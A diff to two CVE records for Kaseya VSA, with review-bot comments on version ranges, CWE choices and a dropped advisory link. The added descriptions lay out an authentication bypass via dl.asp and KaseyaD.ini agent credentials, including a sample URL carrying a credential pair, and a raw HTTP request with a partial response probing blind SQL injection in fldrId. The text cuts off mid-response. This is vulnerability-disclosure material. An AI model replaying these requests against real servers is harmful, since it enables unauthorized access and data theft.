diff --git a/2021/30xxx/CVE-2021-30116.json b/2021/30xxx/CVE-2021-30116.json
index 89a325ef7c3..c895e7c2320 100644
--- a/2021/30xxx/CVE-2021-30116.json
+++ b/2021/30xxx/CVE-2021-30116.json
@@ -12,18 +12,20 @@
 "product": {
 "product_data": [
 {
- "product_name": "n/a",
+ "product_name": "Kaseya VSA (on premise)",
 "version": {
 "version_data": [
 {
- "version_value": "n/a"
+ "version_affected": "<=",
+ "version_name": "9.x",
+ "version_value": "9.5.6"
 }
 ]
 }
 }
 ]
 },
- "vendor_name": "n/a"
+ "vendor_name": "Kaseya"
 }
 ]
 }
@@ -31,11 +33,11 @@
 "credit": [
 {
 "lang": "eng",
- "value": "Discovered by Wietse Boonstra"
+ "value": "Discovered by Wietse Boonstra of DIVD"
 },
 {
 "lang": "eng",
- "value": "Additional research by Frank Breedijk"
+ "value": "Additional research by Frank Breedijk of DIVD"
 }
 ],
 "data_format": "MITRE",
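Review bot: The added range `"version_affected": "<="` with `"version_value": "9.5.6"` does not match the record's own description, which says "before 9.5.7"; any 9.5.6.x build would fall outside `<= 9.5.6` while still being "before 9.5.7". Writing it as `"version_affected": "<", "version_value": "9.5.7"` would mirror the description and the `<` form used for the sibling CVE-2021-30117 record in this same commit. The `product_name` here is `Kaseya VSA (on premise)` while CVE-2021-30117 uses `Kaseya VSA (on premise and SaaS)`; the deployment qualifier changes the product identity between records for what appears to be the same product, so keep the base name identical in both and state the deployment scope in the description where it differs.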
@@ -45,7 +47,7 @@
 "description_data": [
 {
 "lang": "eng",
- "value": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021."
+ "value": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021.\n\nBy default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is https://x.x.x.x/dl.asp\n\nWhen an attacker download a client for Windows and installs it, the file KaseyaD.ini is generated (C:\\Program Files (x86)\\Kaseya\\XXXXXXXXXX\\KaseyaD.ini) which contains an Agent_Guid and AgentPassword\n\nThis Agent_Guid and AgentPassword can be used to log in on dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9)\n\nThis request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication.\n\nSecurity issues discovered\n---\n* Unauthenticated download page leaks credentials\n* Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents\n* dl.asp accepts credentials via a GET request\n* Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients.\n\nImpact\n---\nVia the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system. \n"
 }
 ]
 },
@@ -74,7 +76,7 @@
 "description": [
 {
 "lang": "eng",
- "value": "n/a"
+ "value": "CWE-200 Information Exposure"
 }
 ]
 }
diff --git a/2021/30xxx/CVE-2021-30117.json b/2021/30xxx/CVE-2021-30117.json
index 838c31f58a7..1b88897232d 100644
--- a/2021/30xxx/CVE-2021-30117.json
+++ b/2021/30xxx/CVE-2021-30117.json
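Review bot: The new description embeds a concrete credential pair in the example URL, `un=840997037507813&pw=113cc622…`, and the same agent GUID recurs in the cookie line of the CVE-2021-30117 description later in this commit; a published record should carry placeholders instead, e.g. `https://x.x.x.x/dl.asp?un=<Agent_Guid>&pw=<AgentPassword>`, because readers cannot tell lab values from live ones and the record is copied verbatim into many downstream feeds. The text also uses markdown-style `---` underlines and `*` bullets, which most CVE consumers render as literal characters in a plain-text field; plain sentences would read the same everywhere. Minor wording: `When an attacker download a client` should be `downloads`, and the value ends with a stray space before the final `\n`.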
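Review bot: `CWE-200 Information Exposure` is the only problemtype entry, yet the description added in the previous hunk names distinct weaknesses beyond disclosure: credentials accepted in a GET query string, and agent credentials that yield a session usable for services not meant for agents. The `description` array here can hold several entries, so `CWE-598 Use of GET Request Method With Sensitive Query Strings` and `CWE-522 Insufficiently Protected Credentials` could be listed alongside CWE-200 without changing the primary classification. The enclosing object starts outside this hunk, so the exact key path is inferred from the visible `"description": [` line.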
@@ -1,22 +1,9 @@
 {
- "data_type": "CVE",
- "data_format": "MITRE",
- "data_version": "4.0",
- "generator": {
- "engine": "Vulnogram 0.0.9"
- },
 "CVE_data_meta": {
- "ID": "CVE-2021-30117",
 "ASSIGNER": "cve@mitre.org",
- "DATE_PUBLIC": "",
- "TITLE": "Authenticated SQL injection in Kaseya VSA < v9.5.6",
- "AKA": "",
- "STATE": "PUBLIC"
- },
- "source": {
- "defect": [],
- "advisory": "DIVD-2021-00011",
- "discovery": "UNKNOWN"
+ "ID": "CVE-2021-30117",
+ "STATE": "PUBLIC",
+ "TITLE": "Authenticated SQL injection in Kaseya VSA < v9.5.6"
 },
 "affects": {
 "vendor": {
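Review bot: Removing the `source` object drops `"advisory": "DIVD-2021-00011"`, the only place in this hunk that identifies the coordinating advisory; unless that identifier survives under `references` (outside the hunk), the record loses its link to the disclosure, and the `of DIVD` added to the credit strings does not carry the advisory number. Consider keeping `"source": { "advisory": "DIVD-2021-00011", "discovery": "UNKNOWN" }` or adding the advisory URL under `references`. The top-level object continues outside the hunk; `data_type`, `data_format` and `data_version` reappear in the next hunk, so their removal here is only a reorder, and dropping the empty `DATE_PUBLIC`/`AKA` strings is an improvement over empty-string sentinels.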
@@ -25,84 +12,104 @@
 "product": {
 "product_data": [
 {
- "product_name": "n/a",
+ "product_name": "Kaseya VSA (on premise and SaaS)",
 "version": {
 "version_data": [
 {
- "version_value": "n/a"
+ "version_affected": "<",
+ "version_name": "9.x",
+ "version_value": "9.5.6"
+ }
+ ]
+ }
+ },
+ {
+ "product_name": "Kaseya VSA Agent",
+ "version": {
+ "version_data": [
+ {
+ "version_affected": "<",
+ "version_name": "9.x",
+ "version_value": "9.5.0.23"
 }
 ]
 }
 }
 ]
 },
- "vendor_name": "n/a"
+ "vendor_name": "Kaseya"
 }
 ]
 }
 },
+ "credit": [
+ {
+ "lang": "eng",
+ "value": "Discovered by Wietse Boonstra of DIVD"
+ },
+ {
+ "lang": "eng",
+ "value": "Additional research by Frank Breedijk of DIVD"
+ }
+ ],
+ "data_format": "MITRE",
+ "data_type": "CVE",
+ "data_version": "4.0",
+ "description": {
+ "description_data": [
+ {
+ "lang": "eng",
+ "value": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.\n\nDetailed description\n---\n\nGiven the following request:\n```\nGET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1\nHost: 192.168.1.194\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\nCookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;\n```\n\nWhere the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure.\n\nResponse:\n```\nHTTP/1.1 500 Internal Server Error\nCache-Control: private\nContent-Type: text/html; Charset=Utf-8\nDate: Thu, 01 Apr 2021 19:12:11 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nConnection: close\nContent-Length: 881\n \n\n\n \n
\n \t